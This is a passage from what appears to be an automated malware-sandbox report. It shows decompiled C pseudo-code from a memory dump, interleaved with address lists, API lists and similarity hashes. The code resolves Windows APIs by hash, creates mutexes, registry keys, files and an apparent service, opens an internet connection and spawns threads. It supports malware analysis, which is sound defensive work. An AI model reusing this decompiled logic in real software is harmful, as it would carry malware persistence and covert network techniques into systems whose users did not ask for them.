0x0036b45a
0x0036b461
0x0036b466
0x0036b476
0x0036b478
0x0036b47a
0x00000000
0x00000000
0x00000000
0x00000000
0x0036b47a
0x0036b3f9
0x0036b3fe
0x0036b417
0x0036b42a
0x0036b43b
0x0036b440
0x0036b445
0x0036b44a
0x0036b480
0x0036b480
0x0036b487
0x0036b48e
0x0036b49a
0x0036b4b3
0x0036b4b8
0x0036b4cc
0x0036b4ce
0x0036b4ef
0x0036b4f6
0x0036b501
0x00000000
0x0036b4d0
0x0036b4d7
0x0036b4dc
0x0036b4eb
0x0036b4ed
0x00000000
0x00000000
0x0036b4ed
0x0036b44c
0x0036b503
0x0036b503
0x0036b503
0x0036b44a
0x0036b50c
0x0036b50e
0x0036b514
0x0036b517
0x0036b517
0x0036b51e
0x0036b51e
0x0036b3df
0x0036b52a

APIs

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000), ref: 0036B43B

Strings

\(7, xrefs: 0036B399, 0036B3AD, 0036B3CF, 0036B4E8

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: DescriptorSecurity$ConvertLibraryLoadString
String ID: \(7
API String ID: 3927295052-2131166563
Opcode ID: c7dfc49afa5983a3581ca787573f15bac6d64ffa3d7b4b6741913b4f3f9c3989
Instruction ID: cf3592adf47e50cbaadf952ca3c4e6af6df2e6ad70c9b120dea163fbed792145
Opcode Fuzzy Hash: c7dfc49afa5983a3581ca787573f15bac6d64ffa3d7b4b6741913b4f3f9c3989
Instruction Fuzzy Hash: 3C410DB1D4021577EF126BE0DC43FBFB6689F11705F054414FE18B92D2F7A1A6498AB2

Uniqueness

Uniqueness Score: -1.00%

Function 00361E90, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00361E90(void* __eflags, intOrPtr _a4) {
				short _v440;
				char _v516;
				char _v536;
				char _v1056;
				intOrPtr* _t10;
				void* _t11;
				signed char _t12;
				intOrPtr* _t16;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				char* _t32;
				char* _t33;
				void* _t36;
				void* _t38;

				_t10 = E0035BF50(__eflags, 8, 0x3a5687);
				_t32 =  &_v1056;
				_t11 =  *_t10(0, 0x24, 0, 0, _t32); // executed
				_t12 = E003555C0(_t11, 0);
				_t38 = _t36 + 0x10;
				_t48 = _t12 & 0x00000001;
				if((_t12 & 0x00000001) == 0) {
					L7:
					E00368F20(_a4, E00359D50(0x647400bc));
					__eflags = 0;
					return 0;
				}
				_t16 = E0035BF50(_t48, 3, 0x55e8477);
				 *_t16(_t32);
				_t18 = E0035BF50(_t48, 0, 0xfb8d9e7);
				_t38 = _t38 + 0x10;
				_t33 =  &_v536;
				0;
				while(1) {
					_t19 =  *_t18(_t32, _t33, 0x104); // executed
					_t49 = _t19;
					if(_t19 != 0) {
						break;
					}
					_t23 = E0035BF50(_t49, 3, 0xd0682f7);
					 *_t23(_t32);
					_t25 = E0035BF50(_t49, 3, 0x42c2f97);
					_t38 = _t38 + 0x10;
					_t26 =  *_t25(_t32);
					_t50 = _t26;
					if(_t26 == 0) {
						goto L7;
					}
					_t27 = E00359D50(0x647400af);
					_t29 = E0035BF50(_t50, _t27, E00359D50(0x612a84db));
					 *_t29(_t32);
					_t18 = E0035BF50(_t50, 0, E00359D50(0x6bccd94b));
					_t38 = _t38 + 0x1c;
				}
				__eflags = _v516 - 0x7b;
				if(__eflags != 0) {
					goto L7;
				}
				_v440 = 0;
				_t20 = E0035BF50(__eflags, 0xc, 0xd513d37);
				_t38 = _t38 + 8;
				_t21 =  *_t20( &_v516, _a4);
				__eflags = _t21;
				if(_t21 == 0) {
					return 1;
				}
				goto L7;
			}

0x00361ea3
0x00361eab
0x00361eba
0x00361ebf
0x00361ec4
0x00361ec7
0x00361ec9
0x00361faa
0x00361fbb
0x00361fc3
0x00000000
0x00361fc3
0x00361ed6
0x00361edf
0x00361ee8
0x00361eed
0x00361ef0
0x00361efc
0x00361f00
0x00361f07
0x00361f09
0x00361f0b
0x00000000
0x00000000
0x00361f14
0x00361f1d
0x00361f26
0x00361f2b
0x00361f2f
0x00361f31
0x00361f33
0x00000000
0x00000000
0x00361f3a
0x00361f53
0x00361f5c
0x00361f6e
0x00361f73
0x00361f73
0x00361f78
0x00361f80
0x00000000
0x00000000
0x00361f88
0x00361f98
0x00361f9d
0x00361fa4
0x00361fa6
0x00361fa8
0x00000000
0x00361fd0
0x00000000

APIs

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 00361F07

Strings

{, xrefs: 00361F78

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Volume$LibraryLoadMountNamePoint
String ID: {
API String ID: 3857223526-366298937
Opcode ID: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction ID: 2321053d99c343be1892c865ad222d1263ec00afed9b13f117928116ea61c159
Opcode Fuzzy Hash: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction Fuzzy Hash: E021B5A5E8030576F71232B0AC13FBA21585B6174BF094020FD0CAC1E7FBA5AB5C44B3

Uniqueness

Uniqueness Score: -1.00%

Function 00365180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00365180(void* __ecx, intOrPtr __edx, char* _a4, char _a8) {
				intOrPtr _v20;
				char _v50;
				short _v52;
				char _v572;
				int _t10;
				void* _t16;
				char* _t20;
				void* _t25;
				WCHAR* _t27;
				void* _t28;
				void* _t29;
				void* _t31;

				_t20 = _a4;
				_t25 = __ecx;
				_v20 = __edx;
				_v52 = 0;
				_t34 = _t20;
				if(_t20 == 0) {
					_t20 =  &_v52;
					_v52 = 0x2e;
					E00355CD0(_t34, 0,  &_v50, 2, 3);
					_t28 = _t28 + 0x10;
				}
				_t27 =  &_v572;
				_t10 = E00351490(2, _t25, _t27, 0, 3, 5); // executed
				_t29 = _t28 + 0x18;
				_t35 = _t10;
				if(_t10 != 0) {
					E0035BF50(_t35, 0, E00359D50(0x677c729b));
					_t31 = _t29 + 0xc;
					_t10 = CreateDirectoryW(_t27, 0); // executed
					if(_t10 != 0) {
						_t37 = _a8;
						if(_a8 != 0) {
							E00360F60(_t37, _t27, 1, 1); // executed
							_t31 = _t31 + 0xc;
						}
						E0036ECC0(E00359D50(0x647401a8));
						_t16 = E00351490(0, _t27, E0036FCF0(_v20), _t20, 3, 5); // executed
						return _t16;
					}
				}
				return _t10;
			}

0x0036518c
0x0036518f
0x00365191
0x00365194
0x0036519a
0x0036519c
0x0036519e
0x003651a1
0x003651b1
0x003651b6
0x003651b6
0x003651b9
0x003651c9
0x003651ce
0x003651d1
0x003651d3
0x003651e5
0x003651ea
0x003651f0
0x003651f4
0x003651f6
0x003651fa
0x00365201
0x00365206
0x00365206
0x0036521c
0x00365231
0x00000000
0x00365236
0x003651f4
0x00365243

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 003651F0

Strings

., xrefs: 003651A1

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: CreateDirectory
String ID: .
API String ID: 4241100979-248832578
Opcode ID: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction ID: 3ca59683bfab99c95d238ec8c92f07431422ca30888116066fc063a4b91c0248
Opcode Fuzzy Hash: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction Fuzzy Hash: D811E7A5A4031436FB227695FC5BFBF762C9F51715F054020FE087E2D2FBA15A1885E2

Uniqueness

Uniqueness Score: -1.00%

Function 003658D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E003658D0(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v66;
				char _v124;
				char _v238;
				char _v1278;
				char _v1794;
				void* __esi;
				signed char _t35;
				signed char _t37;
				void* _t38;
				intOrPtr* _t40;
				signed char _t44;
				intOrPtr* _t45;
				signed char _t47;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t63;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t113;
				void* _t116;

				_t116 = __eflags;
				_push(__eax);
				_t1 =  &_a4; // 0x3637e6
				_t86 = __edx;
				_t69 = __ecx;
				_v17 =  *_t1;
				_t89 = L0035C1E0(0x1c);
				E0036ED20(_t30);
				L0036FA50(_t89, _t69);
				_t3 = _t89 + 0xc; // 0xc
				_t77 = _t3;
				L0036FA50(_t3, __edx);
				 *((char*)(_t89 + 0x18)) = _v17;
				_t35 = E00369AC0(_t116, 0xffffffff); // executed
				_t37 = E00354350(_t35 & 0x000000ff, 4);
				_t98 = _t95 + 0x10;
				_t117 = _t37 & 0x00000001;
				if((_t37 & 0x00000001) != 0) {
					_t77 = _t89;
					_t98 = _t98 + 4;
					_pop(_t89);
					_pop(_t86);
					_pop(_t69);
					_pop(_t93);
					_t90 = _t77;
					_t38 = E0036FCF0(_t77 + 0xc);
					_t87 =  &_v1794;
					E00367700(_t87, _t38, 0xffffffff);
					_t40 = E0035BF50(_t117, 3, 0x5ea9ec7);
					 *_t40(_t87, _t89, _t86, _t69, _t93);
					_t44 = E00354350(E00369AC0(_t117, 0xffffffff) & 0x000000ff, 4);
					_t103 = _t98 - 0x6f4 + 0x20;
					if((_t44 & 0x00000001) != 0) {
						_t45 = E0035BF50(__eflags, 9, 0x28243c7);
						_t70 =  *_t45(0, 0, 2);
						_t47 = E0035A500(__eflags, _t46, 0);
						_t105 = _t103 + 0x10;
						__eflags = _t47 & 0x00000001;
						if((_t47 & 0x00000001) == 0) {
							__eflags =  *((char*)(_t90 + 0x18));
							_v24 = _t70;
							if( *((char*)(_t90 + 0x18)) == 0) {
								E00367700( &_v1278, _t87, 0xffffffff);
								_t107 = _t105 + 0xc;
							} else {
								E0036D650(E00357200(0x370840,  &_v66),  &_v1278, 0x208, _t60, _t87);
								_t107 = _t105 + 0x18;
							}
							_t50 = E0035BF50(__eflags, 9, 0x42453f7);
							_t108 = _t107 + 8;
							_v28 = _t50;
							_t51 = E0036FCF0(_t90);
							_t52 = E0036FCF0(_t90);
							_t88 = _v24;
							_t53 = _v28(_t88, _t52, _t51, 0xf01ff, 0x110, 2, 0,  &_v1278, 0, 0, 0, 0, 0);
							__eflags = _t53;
							if(__eflags != 0) {
								_t57 = E0035BF50(__eflags, 9, 0x48eed75);
								_t108 = _t108 + 8;
								 *_t57(_t53);
							}
							_t54 = E00359D50(0x647400a5);
							_t56 = E0035BF50(__eflags, _t54, E00359D50(0x60faedd9));
							_t105 = _t108 + 0x10;
							_t47 =  *_t56(_t88);
						}
					} else {
						_t63 = E00357200(0x370c50,  &_v238);
						_t112 = _t103 + 8;
						_t119 =  *((char*)(_t90 + 0x18));
						_v24 = _t63;
						if( *((char*)(_t90 + 0x18)) == 0) {
							_t64 = E0035BA30(__eflags, _t87);
							_t113 = _t112 + 4;
						} else {
							_t67 = E00357200(0x370840,  &_v124);
							_t68 = E00359D50(0x647402a4);
							_t84 =  &_v1278;
							_t87 =  &_v1278;
							_t64 = E0036D650(_t68, _t84, _t68, _t67,  &_v1278);
							_t113 = _t112 + 0x1c;
						}
						_t47 = E00362450(_t119, 0x80000001, _v24, E0036FCF0(_t90), _t87, _t64);
						_t105 = _t113 + 0x14;
					}
					return _t47;
				} else {
					__eax = E0035BF50(__eflags, 0, 0xa0733d4);
					__eax = CreateThread(0, 0, E0035BE30, __esi, 0, 0); // executed
					__esp = __esp + 4;
					return __eax;
				}
			}

0x003658d0
0x003658d6
0x003658d7
0x003658da
0x003658dc
0x003658de
0x003658ed
0x003658ef
0x003658f7
0x003658fc
0x003658fc
0x00365900
0x00365908
0x0036590d
0x0036591b
0x00365920
0x00365923
0x00365925
0x0036594e
0x00365950
0x00365953
0x00365954
0x00365955
0x00365956
0x0036223c
0x00362241
0x00362246
0x00362250
0x0036225f
0x00362268
0x0036227a
0x0036227f
0x00362284
0x003622e4
0x003622f4
0x003622f9
0x003622fe
0x00362301
0x00362303
0x00362309
0x0036230d
0x00362310
0x0036236f
0x00362374
0x00362312
0x00362331
0x00362336
0x00362336
0x0036237e
0x00362383
0x00362388
0x0036238b
0x00362394
0x003623ba
0x003623be
0x003623c1
0x003623c3
0x003623ce
0x003623d3
0x003623d7
0x003623d7
0x003623de
0x003623f7
0x003623fc
0x00362400
0x00362400
0x00362286
0x00362292
0x00362297
0x0036229a
0x0036229e
0x003622a1
0x0036233c
0x00362341
0x003622a7
0x003622b0
0x003622bf
0x003622c7
0x003622d1
0x003622d3
0x003622d8
0x003622d8
0x00362358
0x0036235d
0x0036235d
0x0036240c
0x00365927
0x0036592e
0x00365944
0x00365946
0x0036594d
0x0036594d

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000BE30,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00365944

Strings

76, xrefs: 003658D7

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: CreateThread
String ID: 76
API String ID: 2422867632-3146555697
Opcode ID: f043cc119fdf06382c0aca5e8d46eee278c3f4230281f82ceeace2b0ee92fba3
Instruction ID: bded8370985febc605a2629fc8d86a8cfb5974f085da51b7a07d00247f0a025a
Opcode Fuzzy Hash: f043cc119fdf06382c0aca5e8d46eee278c3f4230281f82ceeace2b0ee92fba3
Instruction Fuzzy Hash: 1C0170A5B8435436E91261E83C03FBF7B5C4B91779F084075FE5D9D2C3E841661891F2

Uniqueness

Uniqueness Score: -1.00%

Function 0036B710, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0036B710(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, char _a8, intOrPtr _a12) {
				void* _t5;
				intOrPtr* _t8;
				void* _t10;
				intOrPtr* _t11;
				void* _t15;
				void* _t17;

				_t2 =  &_a8; // 0x372850
				E0035BF50(__eflags, 0, 0xee41457);
				_t5 = CreateMutexW(_a4, 0,  *_t2); // executed
				_t17 = 0;
				_t25 = _t5;
				if(_t5 != 0) {
					_t15 = _t5;
					_t8 = E0035BF50(_t25, 0, E00359D50(0x640dea48));
					_t10 = E00353750(_t25,  *_t8(_t15, _a12), 0xffffff7f);
					_t26 = _t10;
					if(_t10 == 0) {
						_t17 = _t15;
					} else {
						_t11 = E0035BF50(_t26, 0, 0xb8e7db5);
						 *_t11(_t15);
					}
				}
				return _t17;
			}

0x0036b719
0x0036b723
0x0036b72f
0x0036b731
0x0036b733
0x0036b735
0x0036b73a
0x0036b74c
0x0036b75e
0x0036b766
0x0036b768
0x0036b77e
0x0036b76a
0x0036b771
0x0036b77a
0x0036b77a
0x0036b768
0x0036b786

APIs

CreateMutexW.KERNEL32(?,00000000,P(7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036B72F

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

Strings

P(7, xrefs: 0036B719, 0036B72B

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: CreateLibraryLoadMutex
String ID: P(7
API String ID: 427046056-1981676551
Opcode ID: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction ID: ce4b462e292bbb95f0aa939a1dfc14f53041e2ff23d3d20526d44d9e87e1de86
Opcode Fuzzy Hash: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction Fuzzy Hash: C7F096AAA4521837E60125B5AC43F7BA21C8FD1B67F064030FE1CEB2D5E651BD0445F2

Uniqueness

Uniqueness Score: -1.00%

Function 00369600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00369600(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v20;
				long _t8;
				long _t9;
				long _t10;
				void* _t11;
				intOrPtr* _t20;
				int _t22;
				signed char _t24;
				long _t25;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t35;

				_push(__eax);
				E0035BF50(__eflags, 0, 0xad68947);
				_t8 = E00359D50(0x247400ac);
				_t9 = E00359D50(0x647400ae);
				_t10 = E00359D50(0x6474002c);
				_t35 = _t31 + 0x14;
				_t11 = CreateFileW(_a4, _t8, 1, 0, _t9, _t10, 0); // executed
				if(_t11 == 0xffffffff) {
					_t24 = 0;
					L9:
					return E00353660(_t46, E00355080(_t46, 0x48, E00352FE0(_t11, _t46, 0x48, 0xff) & 0x000000ff) & _t24 & 0x000000ff, 0) & 0x00000001;
				}
				_t28 = _a8;
				_t30 = _t11;
				if(_t28 == 0) {
					L4:
					_t24 = 1;
					L7:
					_t20 = E0035BF50(_t45, 0, E00359D50(0x6ffa7d19));
					_t35 = _t35 + 0xc;
					_t11 =  *_t20(_t30);
					_t46 = _t24;
					if(_t24 == 0) {
						_t11 = E0036AE30(_t46, _a4);
						_t35 = _t35 + 4;
					}
					goto L9;
				}
				_t25 = _a12;
				_t44 = _t25;
				if(_t25 == 0) {
					goto L4;
				}
				E0035BF50(_t44, 0, 0xabb2b5);
				_t35 = _t35 + 8;
				_t22 = WriteFile(_t30, _t28, _t25,  &_v20, 0); // executed
				_t45 = _t22;
				if(_t22 == 0) {
					_t24 = 0;
					__eflags = 0;
					goto L7;
				}
				goto L4;
			}

0x00369606
0x0036960e
0x0036961d
0x0036962c
0x0036963b
0x00369640
0x0036964f
0x00369654
0x00369688
0x003696b8
0x003696ee
0x003696ee
0x00369656
0x00369659
0x0036965d
0x00369684
0x00369684
0x0036968e
0x0036969e
0x003696a3
0x003696a7
0x003696a9
0x003696ab
0x003696b0
0x003696b5
0x003696b5
0x00000000
0x003696ab
0x0036965f
0x00369662
0x00369664
0x00000000
0x00000000
0x0036966d
0x00369672
0x0036967e
0x00369680
0x00369682
0x0036968c
0x0036968c
0x00000000
0x0036968c
0x00000000

APIs

CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 0036964F
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 0036967E

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction ID: 69f6d08828163ef15a4608c0e71f028fc1cc1a8e31448bd9a28e509c37088ee6
Opcode Fuzzy Hash: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction Fuzzy Hash: E921ABE6A4030576F6132560AC53F7B315C8B6176AF164431FD0C5E2E6F9929E1C45B2

Uniqueness

Uniqueness Score: -1.00%

Function 0036B790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0036B790(void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, signed int _a16) {
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				signed int _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				signed int _t31;
				char* _t32;
				void* _t36;
				void* _t37;
				void* _t38;

				_t30 = _a4;
				E0035BF50(__eflags, 0x13, 0xd0ca371);
				_t38 = _t37 + 8;
				_t26 =  !=  ? _t30 : 0x370580;
				_t10 = InternetOpenA( !=  ? _t30 : 0x370580,  !_a16 & 0x00000001, 0, 0, 0); // executed
				if(_t10 == 0) {
					L6:
					return 0;
				}
				_t36 = _t10;
				_t31 = 0;
				do {
					_t12 = E00359D50(0x647400bf);
					_t14 = E0035BF50(0, _t12, E00359D50(0x61c0d6ad));
					 *_t14(_t36,  *((intOrPtr*)(0x3707fc + _t31 * 8)), 0x370800 + _t31 * 8, 4);
					_t18 = E00351460(0, E003522E0(0, _t31, 0x6ac13eca) + 1, 0x6ac13eca);
					_t38 = _t38 + 0x20;
					_t31 = _t18;
					_t50 = _t18 - 3;
				} while (_t18 != 3);
				_t32 = _a8;
				_t19 = E0035ABC0(_t50, _t32);
				_t20 = 0;
				_t51 = _t19;
				if(_t19 > 0) {
					E0035BF50(_t51, 0x13, 0xae775e1);
					_t20 = InternetConnectA(_t36, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					if(0 == 0) {
						_t22 = E0035BF50(0, 0x13, 0x714b685);
						 *_t22(_t36);
						goto L6;
					}
				}
				return _t20;
			}

0x0036b799
0x0036b7a5
0x0036b7aa
0x0036b7b7
0x0036b7c2
0x0036b7c6
0x0036b87a
0x00000000
0x0036b87a
0x0036b7cc
0x0036b7ce
0x0036b7d0
0x0036b7d5
0x0036b7ee
0x0036b808
0x0036b81f
0x0036b824
0x0036b827
0x0036b829
0x0036b829
0x0036b82e
0x0036b832
0x0036b83c
0x0036b83e
0x0036b840
0x0036b849
0x0036b862
0x0036b866
0x0036b86f
0x0036b878
0x00000000
0x0036b878
0x0036b866
0x0036b880

APIs

InternetOpenA.WININET(00370580,?,00000000,00000000,00000000,?,0035CD77,?,?,?,00000001,00000000,?,0035CD77,?,00000001), ref: 0036B7C2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 0036B862

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: 5ac870907e0016ad950d155ac89bed3932f68f87e732a624825d4766fa6217de
Instruction ID: f2ec826a056b656a25fb5345dc2d01c2b23e60f002db6fbd9aa5d3bbab2dfeb4
Opcode Fuzzy Hash: 5ac870907e0016ad950d155ac89bed3932f68f87e732a624825d4766fa6217de
Instruction Fuzzy Hash: D0213DB6B4021577FA2262716C23F3F215D8B9175AF060034FE0CEF2D2FA50EA0549B2

Uniqueness

Uniqueness Score: -1.00%

Function 003521E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E003521E0(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				long _t20;
				int _t25;
				long _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				long _t32;
				long _t33;
				void* _t42;
				void* _t43;
				void* _t47;

				E0035BF50(_t47, 9, 0x7b43ce7);
				_t43 = _t42 + 8;
				_t20 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
				if(_t20 == 0) {
					_t32 = 0x64;
					_v28 = _a24 & 0x000000ff;
					_v24 = _a20 & 0x000000ff;
					do {
						E00355CD0(__eflags, _a4, _a16, _v24, _v28);
						E0035BF50(__eflags, 9, 0x7b43ce7);
						_t25 = E00359D50(0x647400af);
						_t43 = _t43 + 0x1c;
						_t26 = RegCreateKeyExW(_v20, _a16, 0, 0, 0, _t25, 0,  &_v32,  &_v36); // executed
						__eflags = _t26;
						if(__eflags != 0) {
							goto L3;
						} else {
							_t30 = E0035BF50(__eflags, 9, 0x3111c69);
							_t43 = _t43 + 8;
							 *_t30(_v32);
							__eflags = _v36 - 1;
							if(__eflags != 0) {
								goto L3;
							} else {
								_t33 = 1;
							}
						}
						L8:
						_t27 = E0035BF50(__eflags, 9, 0x3111c69);
						 *_t27(_v20);
						goto L9;
						L3:
						_t32 = _t32 - 1;
						__eflags = _t32;
					} while (__eflags != 0);
					_t33 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t33 = 0;
				}
				L9:
				return _t33;
			}

0x003521f6
0x003521fb
0x00352210
0x00352214
0x00352225
0x0035222a
0x0035222d
0x00352243
0x00352250
0x0035225f
0x00352271
0x00352276
0x0035228e
0x00352290
0x00352292
0x00000000
0x00352294
0x0035229b
0x003522a0
0x003522a6
0x003522a8
0x003522ac
0x00000000
0x003522ae
0x003522ae
0x003522ae
0x003522ac
0x003522b4
0x003522bb
0x003522c6
0x00000000
0x00352240
0x00352240
0x00352240
0x00352240
0x003522b2
0x003522b2
0x00000000
0x00352216
0x00352216
0x00352216
0x003522c8
0x003522d1

APIs

RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00352210
RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0035228E

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction ID: 1e4b3360ae4cf436af8cc2361dffb6861f9de135a31834252e1e442f49c9cc8d
Opcode Fuzzy Hash: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction Fuzzy Hash: BF21CB75A403097FEF129AD0DC43FFF7664AB15711F140424FE147A1E2E261B928C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00362F00, Relevance: 3.1, APIs: 2, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00362F00(void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				char _v118;
				char _v160;
				intOrPtr* _t9;
				intOrPtr* _t16;
				struct HINSTANCE__* _t17;
				WCHAR* _t19;
				struct HWND__* _t22;
				WNDCLASSW* _t25;

				_t36 = __eflags;
				_t25 =  &_v56;
				E00368F20(_t25, 0x28);
				_v52 = E00361070;
				_t9 = E0035BF50(__eflags, 0, 0xa39ecc7);
				_v40 =  *_t9(0);
				_v20 = E00357200(0x370c10,  &_v118);
				E0035BF50(_t36, 1, 0x38227e7);
				RegisterClassW(_t25); // executed
				E0035BF50(_t36, 1, 0xf3c7b77);
				_t16 = E0035BF50(_t36, 0, 0xa39ecc7);
				_t17 =  *_t16(0);
				_t19 = E00357200(0x370790,  &_v84);
				_t22 = CreateWindowExW(0, E00357200(0x370c10,  &_v160), _t19, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, _t17, 0); // executed
				return _t22;
			}

0x00362f00
0x00362f0c
0x00362f12
0x00362f1a
0x00362f28
0x00362f34
0x00362f48
0x00362f52
0x00362f5b
0x00362f64
0x00362f75
0x00362f7f
0x00362f8c
0x00362fce
0x00362fda

APIs

RegisterClassW.USER32(?), ref: 00362F5B

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

CreateWindowExW.USER32(00000000,00000000,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00362FCE

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: ClassCreateLibraryLoadRegisterWindow
String ID:
API String ID: 3459329703-0
Opcode ID: 2c60fe4989f1a6339b3432b6a65ca99c5c43251d576a65659a020b774e1f3aa7
Instruction ID: 8fc7cdbbf3ee4e357814ccf2b8a270aba6c4716e8ca47718fd47907580b7c9ac
Opcode Fuzzy Hash: 2c60fe4989f1a6339b3432b6a65ca99c5c43251d576a65659a020b774e1f3aa7
Instruction Fuzzy Hash: BD117BB6E842187AF72266F0BC03FAE7558DB50B06F240125FE0CBD1C2F5D12A1846F6

Uniqueness

Uniqueness Score: -1.00%

Function 00365420, Relevance: 3.1, APIs: 2, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00365420(WCHAR* _a4) {
				void* _t4;
				signed char _t5;
				long _t7;
				intOrPtr* _t10;
				intOrPtr* _t12;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;
				WCHAR* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t23;

				_t18 = _a4;
				_t17 = 0;
				while(1) {
					E0035BF50(0, 0, 0xad68947);
					_t4 = CreateFileW(_t18, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
					_t19 = _t4;
					_t5 = E00354A90(_t4, 0);
					_t22 = _t20 + 0x10;
					_t28 = _t5 & 0x00000001;
					if((_t5 & 0x00000001) == 0) {
						_t15 = E0035BF50(_t28, 0, 0xb8e7db5);
						_t22 = _t22 + 8;
						 *_t15(_t19);
					}
					E0035BF50(_t28, 0, 0xbf8ba27);
					_t23 = _t22 + 8;
